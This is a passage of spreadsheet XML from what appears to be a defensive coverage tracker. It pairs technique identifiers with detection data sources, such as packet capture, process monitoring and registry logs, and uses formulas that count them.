      </c>
    </row>
    <row r="3" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A3" s="16" t="s">
        <v>46</v>
      </c>
      <c r="B3" s="53" t="str">
        <f>LOOKUP(A3,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
      </c>
      <c r="C3" s="17" t="s">
        <v>47</v>
      </c>
      <c r="D3" s="53">
        <f t="shared" ref="D3:D66" si="1">LEN(TRIM(B3))-LEN(SUBSTITUTE(TRIM(B3),",",""))+1</f>
        <v>4</v>
      </c>
      <c r="E3" s="53">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="F3" s="18"/>
      <c r="G3" s="19"/>
    </row>
    <row r="4" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A4" s="16" t="s">
        <v>48</v>
      </c>
      <c r="B4" s="53" t="str">
        <f>LOOKUP(A4,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,PowerShell logs,Process command-line parameters</v>
      </c>
      <c r="C4" s="17" t="s">
        <v>47</v>
      </c>
      <c r="D4" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E4" s="53">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="F4" s="18"/>
      <c r="G4" s="19"/>
    </row>
    <row r="5" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A5" s="16" t="s">
        <v>49</v>
      </c>
      <c r="B5" s="53" t="str">
        <f>LOOKUP(A5,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C5" s="17" t="s">
        <v>50</v>
      </c>
      <c r="D5" s="53">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E5" s="53">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
      <c r="F5" s="18"/>
      <c r="G5" s="19"/>
    </row>
    <row r="6" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A6" s="16" t="s">
        <v>51</v>
      </c>
      <c r="B6" s="53" t="str">
        <f>LOOKUP(A6,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C6" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D6" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E6" s="53">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
      <c r="F6" s="18"/>
      <c r="G6" s="19"/>
    </row>
    <row r="7" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A7" s="16" t="s">
        <v>53</v>
      </c>
      <c r="B7" s="53" t="str">
        <f>LOOKUP(A7,'REF-DataSources'!A:C)</f>
        <v>API monitoring</v>
      </c>
      <c r="C7" s="17">
        <v>100</v>
      </c>
      <c r="D7" s="53">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E7" s="53">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="F7" s="53"/>
      <c r="G7" s="19"/>
    </row>
    <row r="8" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A8" s="16" t="s">
        <v>54</v>
      </c>
      <c r="B8" s="53" t="str">
        <f>LOOKUP(A8,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C8" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D8" s="53">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E8" s="53">
        <f t="shared" si="0"/>
        <v>2</v>
      </c>
      <c r="F8" s="53"/>
      <c r="G8" s="19"/>
    </row>
    <row r="9" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A9" s="16" t="s">
        <v>56</v>
      </c>
      <c r="B9" s="53" t="str">
        <f>LOOKUP(A9,'REF-DataSources'!A:C)</f>
        <v>Malware reverse engineering,Netflow/Enclave netflow,Packet capture,Process monitoring,Process use of network</v>
      </c>
      <c r="C9" s="17" t="s">
        <v>57</v>
      </c>
      <c r="D9" s="53">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E9" s="53">
        <f>LEN(TRIM(C9))-LEN(SUBSTITUTE(TRIM(C9),";",""))+1</f>
        <v>5</v>
      </c>
      <c r="F9" s="53"/>
      <c r="G9" s="19"/>
    </row>
    <row r="10" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A10" s="16" t="s">
        <v>58</v>
      </c>
      <c r="B10" s="53" t="str">
        <f>LOOKUP(A10,'REF-DataSources'!A:C)</f>
        <v>Malware reverse engineering,Netflow/Enclave netflow,Packet capture,Process monitoring,Process use of network</v>
      </c>
      <c r="C10" s="17" t="s">
        <v>59</v>
      </c>
      <c r="D10" s="53">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E10" s="53">
        <f t="shared" ref="E10:E73" si="2">LEN(TRIM(C10))-LEN(SUBSTITUTE(TRIM(C10),";",""))+1</f>
        <v>3</v>
      </c>
      <c r="F10" s="53"/>
      <c r="G10" s="19"/>
    </row>
    <row r="11" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A11" s="16" t="s">
        <v>60</v>
      </c>
      <c r="B11" s="53" t="str">
        <f>LOOKUP(A11,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C11" s="17" t="s">
        <v>61</v>
      </c>
      <c r="D11" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E11" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F11" s="53"/>
      <c r="G11" s="19"/>
    </row>
    <row r="12" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A12" s="16" t="s">
        <v>62</v>
      </c>
      <c r="B12" s="53" t="str">
        <f>LOOKUP(A12,'REF-DataSources'!A:C)</f>
        <v>User interface,Process monitoring</v>
      </c>
      <c r="C12" s="17" t="s">
        <v>63</v>
      </c>
      <c r="D12" s="53">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E12" s="53">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F12" s="53"/>
      <c r="G12" s="19"/>
    </row>
    <row r="13" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A13" s="16" t="s">
        <v>64</v>
      </c>
      <c r="B13" s="53" t="str">
        <f>LOOKUP(A13,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C13" s="17" t="s">
        <v>65</v>
      </c>
      <c r="D13" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E13" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F13" s="53"/>
      <c r="G13" s="19"/>
    </row>
    <row r="14" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A14" s="16" t="s">
        <v>66</v>
      </c>
      <c r="B14" s="53" t="str">
        <f>LOOKUP(A14,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C14" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D14" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E14" s="53">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F14" s="53"/>
      <c r="G14" s="19"/>
    </row>
    <row r="15" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A15" s="16" t="s">
        <v>68</v>
      </c>
      <c r="B15" s="53" t="str">
        <f>LOOKUP(A15,'REF-DataSources'!A:C)</f>
        <v>BIOS,MBR,System calls</v>
      </c>
      <c r="C15" s="17" t="s">
        <v>69</v>
      </c>
      <c r="D15" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E15" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F15" s="53"/>
      <c r="G15" s="19"/>
    </row>
    <row r="16" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A16" s="16" t="s">
        <v>70</v>
      </c>
      <c r="B16" s="53" t="str">
        <f>LOOKUP(A16,'REF-DataSources'!A:C)</f>
        <v>BIOS,MBR,System calls</v>
      </c>
      <c r="C16" s="17" t="s">
        <v>71</v>
      </c>
      <c r="D16" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E16" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F16" s="53"/>
      <c r="G16" s="19"/>
    </row>
    <row r="17" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A17" s="16" t="s">
        <v>72</v>
      </c>
      <c r="B17" s="53" t="str">
        <f>LOOKUP(A17,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C17" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D17" s="53">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E17" s="53">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F17" s="53"/>
      <c r="G17" s="19"/>
    </row>
    <row r="18" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A18" s="16" t="s">
        <v>73</v>
      </c>
      <c r="B18" s="53" t="str">
        <f>LOOKUP(A18,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C18" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D18" s="53">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E18" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F18" s="53"/>
      <c r="G18" s="19"/>
    </row>
    <row r="19" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A19" s="16" t="s">
        <v>75</v>
      </c>
      <c r="B19" s="53" t="str">
        <f>LOOKUP(A19,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Process monitoring,Process use of network,Process command-line parameters</v>
      </c>
      <c r="C19" s="17" t="s">
        <v>76</v>
      </c>
      <c r="D19" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E19" s="53">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F19" s="53"/>
      <c r="G19" s="19"/>
    </row>
    <row r="20" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A20" s="16" t="s">
        <v>77</v>
      </c>
      <c r="B20" s="53" t="str">
        <f>LOOKUP(A20,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Process monitoring,Process use of network,Process command-line parameters</v>
      </c>
      <c r="C20" s="17" t="s">
        <v>78</v>
      </c>
      <c r="D20" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E20" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F20" s="53"/>
      <c r="G20" s="19"/>
    </row>
    <row r="21" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A21" s="16" t="s">
        <v>79</v>
      </c>
      <c r="B21" s="53" t="str">
        <f>LOOKUP(A21,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process use of network</v>
      </c>
      <c r="C21" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D21" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E21" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F21" s="53"/>
      <c r="G21" s="19"/>
    </row>
    <row r="22" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A22" s="16" t="s">
        <v>80</v>
      </c>
      <c r="B22" s="53" t="str">
        <f>LOOKUP(A22,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Windows event logs,Process use of network,Process monitoring,Process command-line parameters,PowerShell logs,Packet capture,Network protocol analysis,Netflow/Enclave netflow,File monitoring,DLL monitoring,Authentication logs,API monitoring</v>
      </c>
      <c r="C22" s="17">
        <v>100</v>
      </c>
      <c r="D22" s="53">
        <f t="shared" si="1"/>
        <v>13</v>
      </c>
      <c r="E22" s="53">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F22" s="53"/>
      <c r="G22" s="19"/>
    </row>
    <row r="23" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A23" s="16" t="s">
        <v>81</v>
      </c>
      <c r="B23" s="53" t="str">
        <f>LOOKUP(A23,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Netflow/Enclave netflow,Authentication logs,File monitoring</v>
      </c>
      <c r="C23" s="17" t="s">
        <v>82</v>
      </c>
      <c r="D23" s="53">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E23" s="53">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F23" s="53"/>
      <c r="G23" s="19"/>
    </row>
    <row r="24" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A24" s="16" t="s">
        <v>83</v>
      </c>
      <c r="B24" s="53" t="str">
        <f>LOOKUP(A24,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Netflow/Enclave netflow,Authentication logs,File monitoring</v>
      </c>
      <c r="C24" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D24" s="53">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E24" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F24" s="53"/>
      <c r="G24" s="19"/>
    </row>
    <row r="25" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A25" s="16" t="s">
        <v>84</v>
      </c>
      <c r="B25" s="53" t="str">
        <f>LOOKUP(A25,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Netflow/Enclave netflow,Authentication logs,File monitoring</v>
      </c>
      <c r="C25" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D25" s="53">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E25" s="53">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F25" s="53"/>
      <c r="G25" s="19"/>
    </row>
    <row r="26" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A26" s="16" t="s">
        <v>85</v>
      </c>
      <c r="B26" s="53" t="str">
        <f>LOOKUP(A26,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C26" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D26" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E26" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F26" s="53"/>
      <c r="G26" s="19"/>
    </row>
    <row r="27" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A27" s="16" t="s">
        <v>86</v>
      </c>
      <c r="B27" s="53" t="str">
        <f>LOOKUP(A27,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Malware reverse engineering,Process monitoring</v>
      </c>
      <c r="C27" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D27" s="53">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E27" s="53">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F27" s="53"/>
      <c r="G27" s="19"/>
    </row>
    <row r="28" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A28" s="16" t="s">
        <v>87</v>
      </c>
      <c r="B28" s="53" t="str">
        <f>LOOKUP(A28,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Process use of network,File monitoring,Malware reverse engineering,Binary file metadata,Process command-line parameters,Environment variable,Process monitoring,Windows event logs,Network intrusion detection system,Email gateway,SSL/TLS inspection</v>
      </c>
      <c r="C28" s="17" t="s">
        <v>88</v>
      </c>
      <c r="D28" s="53">
        <f t="shared" si="1"/>
        <v>12</v>
      </c>
      <c r="E28" s="53">
        <f t="shared" si="2"/>
        <v>12</v>
      </c>
      <c r="F28" s="53"/>
      <c r="G28" s="19"/>
    </row>
    <row r="29" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A29" s="16" t="s">
        <v>89</v>
      </c>
      <c r="B29" s="53" t="str">
        <f>LOOKUP(A29,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Anti-virus,Binary file metadata</v>
      </c>
      <c r="C29" s="17" t="s">
        <v>90</v>
      </c>
      <c r="D29" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E29" s="53">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F29" s="53"/>
      <c r="G29" s="19"/>
    </row>
    <row r="30" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A30" s="16" t="s">
        <v>91</v>
      </c>
      <c r="B30" s="53" t="str">
        <f>LOOKUP(A30,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C30" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D30" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E30" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F30" s="53"/>
      <c r="G30" s="19"/>
    </row>
    <row r="31" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A31" s="16" t="s">
        <v>92</v>
      </c>
      <c r="B31" s="53" t="str">
        <f>LOOKUP(A31,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C31" s="17" t="s">
        <v>93</v>
      </c>
      <c r="D31" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E31" s="53">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F31" s="53"/>
      <c r="G31" s="19"/>
    </row>
    <row r="32" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A32" s="16" t="s">
        <v>94</v>
      </c>
      <c r="B32" s="53" t="str">
        <f>LOOKUP(A32,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C32" s="17" t="s">
        <v>95</v>
      </c>
      <c r="D32" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E32" s="53">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F32" s="53"/>
      <c r="G32" s="19"/>
    </row>
    <row r="33" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A33" s="16" t="s">
        <v>96</v>
      </c>
      <c r="B33" s="53" t="str">
        <f>LOOKUP(A33,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C33" s="17" t="s">
        <v>97</v>
      </c>
      <c r="D33" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E33" s="53">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="F33" s="53"/>
      <c r="G33" s="19"/>
    </row>
    <row r="34" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A34" s="16" t="s">
        <v>98</v>
      </c>
      <c r="B34" s="53" t="str">
        <f>LOOKUP(A34,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C34" s="17" t="s">
        <v>99</v>
      </c>
      <c r="D34" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E34" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F34" s="53"/>
      <c r="G34" s="19"/>
    </row>
    <row r="35" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A35" s="16" t="s">
        <v>100</v>
      </c>
      <c r="B35" s="53" t="str">
        <f>LOOKUP(A35,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C35" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D35" s="53">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E35" s="53">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F35" s="53"/>
      <c r="G35" s="19"/>
    </row>
    <row r="36" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A36" s="16" t="s">
        <v>101</v>
      </c>
      <c r="B36" s="53" t="str">
        <f>LOOKUP(A36,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C36" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D36" s="53">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E36" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F36" s="53"/>
      <c r="G36" s="19"/>
    </row>
    <row r="37" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A37" s="16" t="s">
        <v>102</v>
      </c>
      <c r="B37" s="53" t="str">
        <f>LOOKUP(A37,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring,Process monitoring,Binary file metadata</v>
      </c>
      <c r="C37" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D37" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E37" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F37" s="53"/>
      <c r="G37" s="19"/>
    </row>
    <row r="38" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A38" s="16" t="s">
        <v>103</v>
      </c>
      <c r="B38" s="53" t="str">
        <f>LOOKUP(A38,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C38" s="17" t="s">
        <v>104</v>
      </c>
      <c r="D38" s="53">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E38" s="53">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F38" s="53"/>
      <c r="G38" s="19"/>
    </row>
    <row r="39" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A39" s="16" t="s">
        <v>105</v>
      </c>
      <c r="B39" s="53" t="str">
        <f>LOOKUP(A39,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C39" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D39" s="53">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E39" s="53">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F39" s="53"/>
      <c r="G39" s="19"/>
    </row>
    <row r="40" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A40" s="16" t="s">
        <v>106</v>
      </c>
      <c r="B40" s="53" t="str">
        <f>LOOKUP(A40,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C40" s="17" t="s">
        <v>107</v>
      </c>
      <c r="D40" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E40" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F40" s="53"/>
      <c r="G40" s="19"/>
    </row>
    <row r="41" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A41" s="16" t="s">
        <v>108</v>
      </c>
      <c r="B41" s="53" t="str">
        <f>LOOKUP(A41,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Host network interface,Netflow/Enclave netflow,Process monitoring</v>
      </c>
      <c r="C41" s="17" t="s">
        <v>109</v>
      </c>
      <c r="D41" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E41" s="53">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F41" s="53"/>
      <c r="G41" s="19"/>
    </row>
    <row r="42" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A42" s="16" t="s">
        <v>110</v>
      </c>
      <c r="B42" s="53" t="str">
        <f>LOOKUP(A42,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Netflow/Enclave netflow,Process monitoring</v>
      </c>
      <c r="C42" s="17" t="s">
        <v>111</v>
      </c>
      <c r="D42" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E42" s="53">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F42" s="53"/>
      <c r="G42" s="19"/>
    </row>
    <row r="43" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A43" s="16" t="s">
        <v>112</v>
      </c>
      <c r="B43" s="53" t="str">
        <f>LOOKUP(A43,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Netflow/Enclave netflow,Process monitoring</v>
      </c>
      <c r="C43" s="17" t="s">
        <v>50</v>
      </c>
      <c r="D43" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E43" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F43" s="53"/>
      <c r="G43" s="19"/>
    </row>
    <row r="44" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A44" s="16" t="s">
        <v>113</v>
      </c>
      <c r="B44" s="53" t="str">
        <f>LOOKUP(A44,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C44" s="17" t="s">
        <v>114</v>
      </c>
      <c r="D44" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E44" s="53">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F44" s="53"/>
      <c r="G44" s="19"/>
    </row>
    <row r="45" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A45" s="16" t="s">
        <v>115</v>
      </c>
      <c r="B45" s="53" t="str">
        <f>LOOKUP(A45,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C45" s="17" t="s">
        <v>78</v>
      </c>
      <c r="D45" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E45" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F45" s="53"/>
      <c r="G45" s="19"/>
    </row>
    <row r="46" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A46" s="16" t="s">
        <v>116</v>
      </c>
      <c r="B46" s="53" t="str">
        <f>LOOKUP(A46,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C46" s="17">
        <v>100</v>
      </c>
      <c r="D46" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E46" s="53">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F46" s="53"/>
      <c r="G46" s="19"/>
    </row>
    <row r="47" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A47" s="16" t="s">
        <v>117</v>
      </c>
      <c r="B47" s="53" t="str">
        <f>LOOKUP(A47,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Network protocol analysis,Packet capture,Process command-line parameters,Process use of network</v>
      </c>
      <c r="C47" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D47" s="53">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E47" s="53">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F47" s="53"/>
      <c r="G47" s="19"/>
    </row>
    <row r="48" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A48" s="16" t="s">
        <v>118</v>
      </c>
      <c r="B48" s="53" t="str">
        <f>LOOKUP(A48,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Netflow/Enclave netflow,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C48" s="17" t="s">
        <v>95</v>
      </c>
      <c r="D48" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E48" s="53">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F48" s="53"/>
      <c r="G48" s="19"/>
    </row>
    <row r="49" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A49" s="16" t="s">
        <v>119</v>
      </c>
      <c r="B49" s="53" t="str">
        <f>LOOKUP(A49,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process use of network,Packet capture,Netflow/Enclave netflow,Network protocol analysis</v>
      </c>
      <c r="C49" s="17" t="s">
        <v>120</v>
      </c>
      <c r="D49" s="53">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E49" s="53">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="F49" s="53"/>
      <c r="G49" s="19"/>
    </row>
    <row r="50" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A50" s="16" t="s">
        <v>121</v>
      </c>
      <c r="B50" s="53" t="str">
        <f>LOOKUP(A50,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C50" s="17" t="s">
        <v>122</v>
      </c>
      <c r="D50" s="53">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E50" s="53">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F50" s="53"/>
      <c r="G50" s="19"/>
    </row>
    <row r="51" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A51" s="16" t="s">
        <v>123</v>
      </c>
      <c r="B51" s="53" t="str">
        <f>LOOKUP(A51,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C51" s="17" t="s">
        <v>76</v>
      </c>
      <c r="D51" s="53">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E51" s="53">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F51" s="53"/>
      <c r="G51" s="19"/>
    </row>
    <row r="52" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A52" s="16" t="s">
        <v>124</v>
      </c>
      <c r="B52" s="53" t="str">
        <f>LOOKUP(A52,'REF-DataSources'!A:C)</f>
